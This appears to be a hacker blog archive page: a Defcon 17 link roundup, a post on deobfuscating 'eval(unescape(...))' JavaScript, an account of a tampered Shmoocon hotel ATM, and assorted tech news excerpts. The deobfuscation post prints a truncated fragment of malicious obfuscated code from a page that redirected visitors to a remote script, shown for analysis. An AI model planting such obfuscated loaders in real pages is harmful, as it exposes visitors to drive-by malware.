The Edge of I-Hacked

Here we will try to sort out all the news, blogs, tools and more. Check back for updates and comment any findings.

Videos:
Defcon 17 Awards Ceremony **Check out I-Hacked/RBCP @ 01:04:56**
Interview Nathan Hamiel and Shawn Moyer on hacking Web 2.0
Quadrotor UAV at Defcon 17
Apple keyboard with evil firmware can root any computer
hacking-defcon-2009-badge
video of KreiosC2
Hacking the iPhone
Defcon Video by Ax0n

Tools/Slides:
dnsTTrap
ucsniff
ippon
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Foca Online
Tactical Fingerprinting using Foca
maltego-firefox
CSRF – Yeah, It Still Works
KreiosC2
Prank o Matic

Photos:
vissago
stits -some NSFW-
epitti

Music:
BlackBall Defcon 17- up’D by Great Scott

Misc/Blog:
Black Hat USA 2009 Media Archives
Ax0n’s DefCon 17 Wrap-Up
RBCP’s Blog on Defcon
DEFCON 0×11 Post-Mortem

News:
Feds at DefCon Alarmed After RFIDs Scanned
Researchers offer tools for eavesdropping and video hijacking
Danger from automatic updates
Hanging with hackers can make you paranoid
Rio hotel in Las Vegas responds to claims over malicious ATMs
Malicious ATM Catches Hackers
iPhone attacked by SMS – Danger!

Also known as “eval( unescape” decryption

Recently, @surbo was working an investigation where he came across some obfuscated code which was innocuously included in an otherwise un-threatening html file. He had noticed that the result of the code was to push the client to a .js file which was being hosted on a .cn domain. (that cant be good)

However when viewing the source of the html page, he was presented with a fairly common technique often called “Encrypting HTML” which really should be considered “Obfuscating HTML” because all that the programmer has done is converted “human readable” code into “Human-Unreadable, yet Browser-Readable” code. Below is a small extract of this obfuscated code.

<script>eval( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d));

He needed to come up with a way to easily de-obfuscate this, and came up with something I feel very clever.. Re-write eval into alert and save it to a local file.

Re-Written:
<script>alert( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d));

When loaded into a browser, the BROWSER to translate the obfuscated code into human readable form, and give it to you in a nice alert box allowing you to copy and paste!

Well, this is an easy way to do it by hand if you are ever in a pinch.. But if you are using firefox I suggest you should check out JavaScript Deobfuscator

via New Scientist

A firm that has designed habitats for plants and animals living in microgravity now hopes to grow the first flowers on the moon, the company’s founders announced on Friday.

Engineering firm Paragon Space Development plans to build a greenhouse to fly to the moon. It is set to travel on a lunar lander designed by Odyssey Moon, a competitor for the Google Lunar X Prize, a $30 million contest to send an unmanned lunar rover to the moon.

The greenhouse will be used to incubate fast-growing mustard seeds on the lunar surface, in the hopes of producing flowering plants and an iconic image that could be as thrilling as the Apollo images of Earth-rise over the lunar surface.

Last night I put out a post on twitter informing that the Shmoocon ATM had been compromised, and everyone who had used it should cancel & reissue their cards. This of course got retweeted a bunch, and then FINALLY some security people started commenting that we should have some evidence before they take action.

So some may have seen the ATMs in the hotel were “tagged” with this prank and thought that THIS was the compromise I was referring to.

Making Faces is illegal.

This was funny, and I have a pretty good idea who put it there. (and really if it was “them” I would think twice of touching that ATM anyways) But it was not a compromise.

@surbo and I were running late to the airport, and the taxi driver wouldnt take a card. Having spent all our cash the night before, we ran over to the ATM located in the main hallway of the Marriott (across from the hotel convenience store) and I tried the ATM. It was acting very odd, it was taking about 5 minutes to change screens, and it was NOT TAKING MY PIN on my card, and occasionally told me that it could not read the card. I got a very bad feeling, but I was in a hurry, so I tried another card. Same story — acting weird not taking my pin. I asked Surbo to give it a go, and this time it took his pin, but it was still acting weird.

Surbo then did something that made us both say “F&^K”. He pulled the facepanel down off the ATM exposing the internal computer and authentication “dialer”, someone had either picked or left the panel unlocked. (the safe panel ($$$$) remained locked). The electronics that control the authorization of funds were easily accessed. You can imagine what an person of “low moral standards” could have benefited from this situation.

Right about the time that Surbo pulled the front panel down, Mouse came strolling by and said “Boys! What are you doing!?” It didnt look good, and since we had already had some run-ins with hotel police we immediately put it back and made sure it was reported. We didnt take any pictures because we didnt want to be any more involved than we already were. I am sure you can understand that although we pull some harmless pranks here or there, ATM fraud is not up our alley.

So, Do I have evidence that if you used that ATM that your card numbers & pin were exposed and/or recorded? No, in-fact I did not see any suspicious looking equipment inside that would indicate that it had, however the security of the ATM was compromised and the potential was definitely there. Don’t risk it, if you used this ATM, please call your bank and get your card reissued.

Update: I have now learned that the ATMs were using the default admin password. (crap see comments below)

from news.cnet

The auto-suggest feature of Google’s new Chrome browser does more than just help users get where they are going. It will also give Google a wealth of information on what people are doing on the Internet besides searching.

from Yahoo! News

Intel on Thursday showed off a wireless electric power system that analysts say could revolutionize modern life by freeing devices from transformers and wall outlets.

Intel chief technology officer Justin Rattner demonstrated a Wireless Energy Resonant Link as he spoke at the California firm’s annual developers forum in San Francisco.

Electricity was sent wirelessly to a lamp on stage, lighting a 60 watt bulb that uses more power than a typical laptop computer.

Most importantly, the electricity was transmitted without zapping anything or anyone that got between the sending and receiving units.

“The trick with wireless power is not can you do it; it’s can you do it safely and efficiently,” Intel researcher Josh Smith said in an online video explaining the breakthrough.

YouTube – Google Earth Demo
Video demonstration of F-Secure’s WorldMap data in Google Earth.
http://www.f-secure.com/weblog/

from consumerist

The Consumerist’s 3-month sting operation snared a Geek Squad technician stealing porn from our hard drive, and we’ve got the work-safe video and logfiles to prove it.

from shacknews

 

A Sony Computer Entertainment representative has confirmed to Shacknews that developers can now take full advantage of the PSP’s CPU following the late May release of the system’s version 3.50 firmware. Rumors of the unlocking were initially reported by fansite PSP Updates via an unnamed source.

Previously, developers were only able to run the CPU at 266MHz rather than its full potential clock speed of 333MHz, though most games ran at only 222MHz. High Impact Games’ Ratchet & Clank: Size Matters, released in February, is said to run at 266MHz. Hackers long ago discovered methods to run the PSP’s CPU at full speed, the benefits of which include a smoother framerate for certain games, at the cost of reduced battery life. There is no word yet if this update enables previous PSP releases to run at 333MHz, something hacked PSP firmware has enabled in the past.

It is widely believed that the PSP CPU was underclocked to increase the portable’s battery life. Some speculate that the availability of the portable’s full CPU speed affirms recent rumors of an upcoming redesign, which supposedly includes a brighter screen, a slimmer profile, and increased battery life. Such a system would be better equipped to deal with the greater power demands of the unthrottled CPU.

from Engadget

Reports of MacBook Pros getting crazy-hot because of misapplied thermal grease have been floating around for a year now, and it doesn’t look like the recent bump to Santa Rosa has changed anything. A reader at the MacRumors forums noticed his week-old MBP getting a little hot, so he bravely decided to pull the unit apart to check things out and found what he estimated to be forty times too much paste applied to the logic board. There are also a few threads on the Apple support site with similar pics of MBP logic boards slathered in grease, so this doesn’t appear to be an isolated issue. Apple hasn’t commented yet, but seeing as it managed to cool things down last time with a firmware update, we wouldn’t expect too much fanfare when this finally gets resolved.